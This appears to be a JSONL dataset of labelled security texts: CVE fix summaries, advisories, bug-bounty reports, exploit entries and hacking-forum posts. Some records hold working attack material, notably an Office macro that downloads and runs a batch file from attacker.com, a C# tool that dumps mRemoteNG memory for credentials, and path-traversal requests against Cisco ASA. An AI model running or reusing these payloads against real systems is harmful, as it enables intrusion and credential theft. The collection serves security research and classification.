+{"id": "adf65d8489e373c82f1c", "text": "CVE: CVE-2022-24771\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.'}]\n\nFix commit: Fix signature verification issues.\n\n**SECURITY**: Three RSA PKCS#1 v1.5 signature verification issues were\nreported by Moosa Yahyazadeh (moosa-yahyazadeh@uiowa.edu):\n\n- Leniency in checking `digestAlgorithm` structure can lead to signature\n forgery.\n - The code is lenient in checking the digest algorithm structure. This can\n allow a crafted structure that steals padding bytes and uses unchecked\n portion of the PKCS#1 encoded message to forge a signature when a low\n public exponent is being used.\n- Failing to check tailing garbage bytes can lead to signature forgery.\n - The code does not check for tailing garbage bytes after decoding a\n `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed\n and garbage data added to forge a signature when a low public exponent is\n being used.\n- Leniency in checking type octet.\n - `DigestInfo` is not properly checked for proper ASN.1 structure. This can\n lead to successful verification with signatures that contain invalid\n structures but a valid digest.\n\nFor more information, please see \"Bleichenbacher's RSA signature forgery based\non implementation error\" by Hal Finney:\nhttps://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/\n\nFixed with the following:\n\n- [asn1] `fromDer` is now more strict and will default to ensuring all\n input bytes are parsed or throw an error. A new option `parseAllBytes`\n can disable this behavior.\n - **NOTE**: The previous behavior is being changed since it can lead\n to security issues with crafted inputs. It is possible that code\n doing custom DER parsing may need to adapt to this new behavior and\n optional flag.\n- [rsa] Add and use a validator to check for proper structure of parsed\n ASN.1 `RSASSA-PKCS-v1_5` `DigestInfo` data. Additionally check that\n the hash algorithm identifier is a known value. An invalid\n `DigestInfo` or algorithm identifier will now cause an error to be\n thrown.\n- [oid] Added `1.2.840.113549.2.2` / `md2` for hash algorithm checking.\n- [tests] Tests were added for all of the reported issues. A private\n verify option was added to assist in checking multiple possible\n failures in the test data.", "source": "cvefixes", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8346459f66cf153ed427", "text": "Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)\n\n## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)\n## Author: nu11secur1ty\n## Date: 06.27.2023\n## Vendor: https://www.microsoft.com/\n## Software: https://www.microsoft.com/en-us/microsoft-365/excel\n## Reference: https://portswigger.net/daily-swig/rce\n## CVE-2023-33137\n\n\n## Description:\nThis exploit is connected with third part exploit server, which waits\nfor the victim to call him and execute the content from him using the\npipe posting method! This is absolutely a 0-day exploit! This is\nabsolutely dangerous for the victims, who are infected by him!\nWhen the victim hit the button in the Excel file, it makes a POST\nrequest to the exploit server, and the server is responding back that\nway: He creates another hidden malicious file and executed it directly\non the machine of the victim, then everything is disappeared, so\nnasty.\n\nSTATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!\n\n[+]Exploit:\n```vbs\nSub AutoOpen()\n Call Shell(\"cmd.exe /S /c\" & \"curl -s\nhttps://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat\n> maloumnici.bat && .\\maloumnici.bat\", vbNormalFocus)\nEnd Sub\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)\n\n## Proof and Exploit:\n[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)\n\n## Time spend:\n01:27:00", "source": "exploitdb", "timestamp": "2023-07-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "05b88613e21a4e09d49e", "text": "Hi, There is the GUI in Applications Menu at the 1st line Privacy, as you mentioned the console was irresponsible I would try the GUI interface instead console. Sound silly but it might make it work smoother as there are other options in the GUI as well.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e450c4d06ad13cf2fef2", "text": "I got the same problem Do you remember how to fix it?", "source": "hackthebox", "timestamp": "2023-06-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "607804b5ea1b2cd4e8a0", "text": "Can anyone write to me privately please. I have a question about the optional task and would like to understand it. I have all 5 flags, for info.", "source": "hackthebox", "timestamp": "2023-08-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "68598736f49b02e495ae", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-06-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "eeef9152f9527b1dd8f5", "text": "CVE: CVE-2022-29532\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is XSS in the cerebrate view if one administrator puts a javascript: URL in the URL field, and another administrator clicks on it.'}]\n\nFix commit: fix: [security] XSS in cerebrate view\n\n- low probability XSS in the cerebrate view's URL field\n- a malicious administrator could set a javascript: url\n- another administrator would have to click the suspicious looking URL to be affected\n\n- As reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "source": "cvefixes", "timestamp": "2022-04-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "82a6cb80edeff424eb59", "text": "mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory\n\n# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory\n# Google Dork: -\n# Date: 21.07.2023\n# Exploit Author: Maximilian Barz\n# Vendor Homepage: https://mremoteng.org/\n# Software Link: https://mremoteng.org/download\n# Version: mRemoteNG <= v1.77.3.1784-NB\n# Tested on: Windows 11\n# CVE : CVE-2023-30367\n\n\n\n\n/*\nMulti-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to\nstore and manage multi-protocol connection configurations to remotely connect to systems.\n\nmRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev\nloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,\neven if no connection has been established yet. This allows attackers to access contents of configuration files in plain text\nthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.\nThis also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.\nFull Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper\n*/\n\n\nusing System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.IO;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Text.RegularExpressions;\n\n\nnamespace mRemoteNGDumper\n{\npublic static class Program\n{\n\npublic enum MINIDUMP_TYPE\n{\nMiniDumpWithFullMemory = 0x00000002\n}\n\n[StructLayout(LayoutKind.Sequential, Pack = 4)]\npublic struct MINIDUMP_EXCEPTION_INFORMATION\n{\npublic uint ThreadId;\npublic IntPtr ExceptionPointers;\npublic int ClientPointers;\n}\n\n[DllImport(\"kernel32.dll\")]\nstatic extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);\n\n[DllImport(\"Dbghelp.dll\")]\nstatic extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);\n\n\nstatic void Main(string[] args)\n{\nstring input;\nbool configfound = false;\nStringBuilder filesb;\nStringBuilder linesb;\nList configs = new List();\n\nProcess[] localByName = Process.GetProcessesByName(\"mRemoteNG\");\n\nif (localByName.Length == 0) {\nConsole.WriteLine(\"[-] No mRemoteNG process was found. Exiting\");\nSystem.Environment.Exit(1);\n}\nstring assemblyPath = Assembly.GetEntryAssembly().Location;\nConsole.WriteLine(\"[+] Creating a memory dump of mRemoteNG using PID {0}.\", localByName[0].Id);\nstring dumpFileName = assemblyPath + \"_\" + DateTime.Now.ToString(\"dd.MM.yyyy.HH.mm.ss\") + \".dmp\";\nFileStream procdumpFileStream = File.Create(dumpFileName);\nMINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();\n\n// A full memory dump is necessary in the case of a managed application, other wise no information\n// regarding the managed code will be available\nMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;\nMiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);\nprocdumpFileStream.Close();\n\nfilesb = new StringBuilder();\nConsole.WriteLine(\"[+] Searching for configuration files in memory dump.\");\nusing (StreamReader reader = new StreamReader(dumpFileName))\n{\nwhile (reader.Peek() >= 0)\n{\ninput = reader.ReadLine();\nstring pattern = @\"(\\ )\\/>\";\nMatch m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);\nif (m.Success)\n{\nconfigfound = true;\n\nforeach (string config in m.Value.Split('>'))\n{\nconfigs.Add(config);\n}\n}\n\n}\n\nreader.Close();\nif (configfound)\n{\nstring currentDir = System.IO.Directory.GetCurrentDirectory();\nstring dumpdir = currentDir + \"/dump\";\nif (!Directory.Exists(dumpdir))\n{\nDirectory.CreateDirectory(dumpdir);\n}\n\nstring savefi", "source": "exploitdb", "timestamp": "2023-07-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e90a30948cdd3261792e", "text": "CVE: CVE-2022-23617\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit right can copy the content of a page it does not have access to by using it as template of a new page. This issue has been patched in XWiki 13.2CR1 and 12.10.6. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-18430: Wrong handling of template documents\n* improve retro compatibility with future 12.10.x versions", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9bd02a2c82e9f076d55b", "text": "Looking For Advice\n\nI guess a little back story info would be in order. I’m a pastor of 2 very small congregations in the Upstate of SC. I don’t take a salary (obviously out of the question due to the size). I pay my bills driving an 18 wheeler that allows me to be home every night and all weekend long. I was diagnosed with macular degeneration in my right eye and it’s beginning to seriously affect my vision. I have a DOT card that is good for 1 year so that gives me a little less than a year to prepare myself for a new career. Realistically, what skills do you believe I could develop in a year’s time that would make me marketable breaking into the IT field? I’m a 48 year old male with a little above average intelligence but certainly not super intelligent. I’ve been using various Linux distros for 12 years or so. Ideally I would like to be self employed but even remote working would be acceptable. I’m about an hour and a half south of Charlotte NC and 3 hours from Atlanta GA. Thanks.", "source": "parrotsec", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "daba7632e9f9ed83ca26", "text": "for some reason you need to append the leaked address at the payload i just tried it and it works i don’t know the reason why", "source": "hackthebox", "timestamp": "2023-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bd9310ff44334de54df1", "text": "Rancher Webhook is misconfigured during upgrade process\n\n[Severity: CRITICAL]\n\n### Impact\n\nA failure in the update logic of Rancher's admission Webhook may lead to the misconfiguration of the Webhook. This component enforces validation rules and security checks before resources are admitted into the Kubernetes cluster.\n\nWhen the Webhook is operating in a degraded state, it no longer validates any resources, which may result in severe privilege escalations and data corruption.\n\nThe issue only affects users that upgrade from `2.6.x` or `2.7.x` to `2.7.2`. Users that did a fresh install of 2.7.2 (and did not follow an upgrade path) are not affected.\n\nThe command below can be executed on the `local` cluster to determine whether the cluster is affected by this issue:\n\n```sh\n$ kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io\n\nNAME WEBHOOKS AGE\nrancher.cattle.io 0 19h\n```\n\nIf the resulting webhook quantity is `0`, the Rancher instance is affected.\n\n### Patches\n\nPatched versions include release `2.7.3` and later versions.\n\n### Workarounds\n\nIf you are affected and cannot update to a patched Rancher version, the recommended workaround is to manually reconfigure the Webhook with the script below. Please note that the script must be run from inside the `local` cluster or with a kubeconfig pointing to the `local` cluster which has admin permissions.\n\n```yaml\n#!/bin/bash\n\nset -euo pipefail\n\nfunction prereqs() {\n if ! [ -x \"$(command -v kubectl)\" ]; then\n echo \"error: kubectl is not installed.\" >&2\n exit 1\n fi\n\n if [[ -z \"$(kubectl config view -o jsonpath='{.clusters[].cluster.server}')\" ]]; then\n echo \"error: No kubernetes cluster found on kubeconfig.\" >&2\n exit 1\n fi\n}\n\nfunction restart_deployment(){\n kubectl rollout restart deployment rancher-webhook -n cattle-system\n kubectl rollout status deployment rancher-webhook -n cattle-system --timeout=30s\n}\n\nfunction workaround() {\n echo \"Cluster: $(kubectl config view -o jsonpath='{.clusters[].cluster.server}')\"\n\n if ! kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io > /dev/null 2>&1; then\n echo \"webhook rancher.cattle.io not found, restarting deployment:\"\n restart_deployment\n\n echo \"waiting for webhook configuration\"\n sleep 15s\n fi\n\n local -i webhooks\n webhooks=\"$(kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io --no-headers | awk '{ print $2 }')\"\n\n if [ \"${webhooks}\" == \"0\" ]; then\n echo \"Webhook misconfiguration status: Cluster is affected by CVE-2023-22651\"\n \n echo \"Running workaround:\"\n kubectl delete validatingwebhookconfiguration rancher.cattle.io\n restart_deployment\n\n ret=$?\n if [ $ret -eq 0 ]; then\n echo \"Webhook restored, CVE-2023-22651 is fixed\"\n else\n echo \"error trying to restart deployment. try again in a few seconds.\"\n fi\n else\n echo \"Webhook misconfiguration status: not present (skipping)\"\n fi\n\n echo \"Done\"\n}\n\nfunction main() {\n prereqs\n workaround\n}\n\nmain\n```\n\n### References\n- https://github.com/rancher/webhook/pull/216/commits/a4a498613b43a3ee93c5ab06742a3bc8adace45d\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).", "source": "github_advisory", "timestamp": "2023-04-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3a906351222eb5447500", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-07-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "59fa5c35e5b6361991c4", "text": "Don’t know if you figured it out but I ran into the same problem and I fixed it by specifying a rule on Defender firewall to specifically allow inbound traffic on TCP port 445, which the default port for smbclient.", "source": "hackthebox", "timestamp": "2023-07-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f8e6924a1ccd6f388bf8", "text": "CVE: CVE-2022-1931\n\n[{'lang': 'en', 'value': 'Incorrect Synchronization in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(messages): validation check", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0a7fa4b1ebf2e401c5a7", "text": "CVE: CVE-2022-0278\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: xss on contact form fix", "source": "cvefixes", "timestamp": "2022-01-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e38356249b0863c8aee4", "text": "Alkacon OpenCMS XSS via searchfilter parameter in system/workplace/admin/workplace/sessions.jsp\n\n[Severity: LOW]\n\nCross-site scripting (XSS) vulnerability in system/workplace/admin/workplace/sessions.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the searchfilter parameter, a different vector than CVE-2008-1510.", "source": "github_advisory", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bbbae09b015d06fe17d0", "text": "CVE: CVE-2022-33146\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.'}]\n\nFix commit: added validation of send attribute in admin", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e1b7bb037841e2acb9c5", "text": "Hi, I hope someone can give me a hint on this. I’m stuck, I am able to run the code that @XSSDoctor shared, but when running with loader.py the values from $rdx , the only thing I get is a red dollar sign as if it’s a shell, and then when I write any command ( whoami , ls ) goes back to my system prompt, and even the result of echo $? is 0 , so it ran correctly. I don’t know if my shellcode is not correctly formatted, I’m hard stuck. I would appreciate any help, DM me if required.", "source": "hackthebox", "timestamp": "2023-10-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "dae9747cb8f1e4fe5c27", "text": "Apt list --installed | wc When I tried to enter -1 or -| The system didn’t recognize the command Edit: (in the next section, the specify it as “-l” AKA lowercase L. Didn’t get to try that one) The output also listed 3 numbers: 738 2949 55881 Subtracted 1 from the first number and got the answer, though I still don’t know why 3 numbers were listed. Also, I’d love to know how to use this information in a theoretical attack", "source": "hackthebox", "timestamp": "2023-02-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4191b505d4fcb59d63e6", "text": "[Path Traversal] CVE-2020-3452 on https://█████/\n\nHello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://██████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f118143aa9e2583db81a", "text": "Good Morning, Apollyon!!! I just wanted to let you know after reading post and comments, I decided to send a request to join your team. ( either d4rk3m0 or JTCHD007 ) I am still fairly to the community and I have never been in an ( Actually team ) before. I am looking forward to joining the team! if you have any questions, do not hesitate to DM me -JTCHD", "source": "hackthebox", "timestamp": "2022-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "081ff65960e5b602cae5", "text": "CVE: CVE-2022-31003\n\n[{'lang': 'en', 'value': 'Sofia-SIP is an open-source Session Initiation Protocol (SIP) User-Agent library. Prior to version 1.13.8, when parsing each line of a sdp message, `rest = record + 2` will access the memory behind `\\\\0` and cause an out-of-bounds write. An attacker can send a message with evil sdp to FreeSWITCH, causing a crash or more serious consequence, such as remote code execution. Version 1.13.8 contains a patch for this issue.'}]\n\nFix commit: Merge pull request from GHSA-8w5j-6g2j-pxcp\n\nFix Heap-buffer-overflow in parse_descs and parse_message", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0d5d59be8fe390ac3768", "text": "Red Team Training, C2 frameworks?\n\nCan we do in Caldera, what we can do with Empire? Caldera can do more, but can Caldera be used instead of Empire? Like ZAP can do what Burp can, and vice versa.", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "75f5d0f505fccaa13160", "text": "I am unable to get the flag.txt. I’ve tried to copy it: Click to reveal spoiler I’ve tried to cat it: Click to reveal spoiler I’ve tried to move it but got a permissions error. I’ve managed to print the error on the page itself when I put the payloads in the “to” field instead of the from field but it still does not print the flag I’ve tried many variations of these payloads but none are working. I’ve been stuck on this for 3 days now. Any assistance will be appreciated.", "source": "hackthebox", "timestamp": "2023-10-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "01686f49636630ad5def", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-0943, CVE-2018-8130, CVE-2018-8133, CVE-2018-8145.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "98b04f5591ca99ea2f3e", "text": "CVE: CVE-2022-0282\n\n[{'lang': 'en', 'value': 'Code Injection in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: fix comments xss", "source": "cvefixes", "timestamp": "2022-01-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "413daf3682023dc113e0", "text": "CVE: CVE-2022-1543\n\n[{'lang': 'en', 'value': 'Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. When the text size is large enough the service results in a momentary outage in a production environment. That can lead to memory corruption on the server.'}]\n\nFix commit: fixed profile name not limited in length", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "93a1a50b917feffe08dd", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability.\" This CVE ID is unique from CVE-2017-0228, CVE-2017-0229, CVE-2017-0230, CVE-2017-0234, CVE-2017-0235, CVE-2017-0236, and CVE-2017-0238.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9bea22eddf29c0cf8e76", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27535: FTP too eager connection reuse\n\n## Summary:\nlibcurl FTP(S) protocol will reuse connection even if different `CURLOPT_FTP_ACCOUNT` (libcurl) or `--ftp-account` (curl) is specified for different connections and the server requests account authentication via reply code `332`. It appears that `STRING_FTP_ALTERNATIVE_TO_USER ` (libcurl) or `--ftp-alternative-to-user` (curl) is also affected and should also result in caching being refused.\n\n## Steps To Reproduce:\n\n 1. terminal 1: `echo -e \"foo\\n\" | nc -v -l -p 9998; echo -e \"bar\\n\" | nc -v -l -p 9998`\n 2. terminal 2: `echo -ne \"220 a\\n331 b\\n332 c\\n230 d\\n257 \\\"/\\\"\\n229 (|||9998|)\\n200 e\\n213 4\\n150 f\\n226 g\\n229 (|||9998|)\\n213 4\\n150 f\\n226 g\\n\" | nc -v -l -p 9999`\n 3. terminal 3: `curl -v --ftp-account alice \"ftp://ftp@server:9999/file1\" -: --ftp-account bob \"ftp://ftp@server:9999/file2\"`\n\nAs a result connection authenticated as user `alice` will be used when fetching `file2` regardless that user `bob` was specified for fetching it.\n\n## Remediation\n* Don't reuse connection if `CURLOPT_FTP_ACCOUNT` or `STRING_FTP_ALTERNATIVE_TO_USER` are different.\n\n## Supporting Material/References:\n* https://www.ietf.org/rfc/rfc0959.txt\n\n## Impact\n\nAccessing content with wrong cached credentials.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "34c5f515b5719a394107", "text": "CVE: CVE-2021-45943\n\n[{'lang': 'en', 'value': 'GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment).'}]\n\nFix commit: Merge pull request #4944 from rouault/fix_ossfuzz_41993\n\nPCIDSK: fix write heap-buffer-overflow. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=41993", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "df79cfab8fe493fac3a4", "text": "StationX – 1 May 20 Nmap Cheat Sheet Example IDS Evasion command", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d274cdd2eadf6553ef63", "text": "Thanks @n0manarmy . I was getting the reverse shell as “htb-student”. Then I ran “./leave_msg $( python -c…)” and in the end I got the reverse shell as root", "source": "hackthebox", "timestamp": "2023-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9c298144ecf420401a8f", "text": "image 834×496 197 KB I’m not sure, why am I not able to ssh into htb-student?", "source": "hackthebox", "timestamp": "2023-12-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c29fda1f84202682a00a", "text": "CVE: CVE-2022-23597\n\n[{'lang': 'en', 'value': \"Element Desktop is a Matrix client for desktop platforms with Element Web at its core. Element Desktop before 1.9.7 is vulnerable to a remote program execution bug with user interaction. The exploit is non-trivial and requires clicking on a malicious link, followed by another button click. To the best of our knowledge, the vulnerability has never been exploited in the wild. If you are using Element Desktop < 1.9.7, we recommend upgrading at your earliest convenience. If successfully exploited, the vulnerability allows an attacker to specify a file path of a binary on the victim's computer which then gets executed. Notably, the attacker does *not* have the ability to specify program arguments. However, in certain unspecified configurations, the attacker may be able to specify an URI instead of a file path which then gets handled using standard platform mechanisms. These may allow exploiting further vulnerabilities in those mechanisms, potentially leading to arbitrary code execution.\"}]\n\nFix commit: Merge pull request from GHSA-mjrg-9f8r-h3m7\n\n* Patch part 1: remove electronVersion\n\nWe no longer need to specify electronVersion at all since electron\nis now in devDependencies. Removing it means electron can be updated\nthe same way as any other dependency.\n\n* Only allow main app page to be opened via URL\n\nWe previously allowed any URL to be opened in the main electron\nwindow. Allow only the main app page, as commented.\n\n* use exact equals\n\n* Make url logic clearer", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bb0482cf9259654eff54", "text": "maybee somebody can help me ? i try move some file to tmp directory, but always have an error (((", "source": "hackthebox", "timestamp": "2022-01-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0808994fcf35892776cc", "text": "+1 for me. I tried ``` dpkg --list | wc --lines which gave me 748. Im not sure what the difference is.", "source": "hackthebox", "timestamp": "2023-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b6342bb7d3f75d11d966", "text": "Who has experience with Bloodhound?\n\nG’Day, Hackersploit Community! I’m a cybersecurity researcher conducting a study on the use of Bloodhound in penetration testing, red teaming, and offensive cyber operations. Your expertise could provide invaluable insights into these practices. Who I’m Looking For: Individuals with hands-on experience using Bloodhound. Those willing to share their insights. What’s In It For You: An opportunity to contribute to a study that aims to enhance deployment of cybersecurity deception tools. acknowledgment in research publications (username or real name as preferred) How to Participate: Please reach out via andrew.reeves@adelaide.edu.au if you’re interested or have any questions. Participation involves up to 1 hour of preparation time (familiarising yourself with a provided bloodhound map) and a short (30 minute) interview with the researcher. You can opt to complete a short survey instead of the interview if preferred. Your expertise is greatly appreciated and will help shape the deployment of new cyber deception tools. Thank you! Andrew", "source": "hackersploit", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
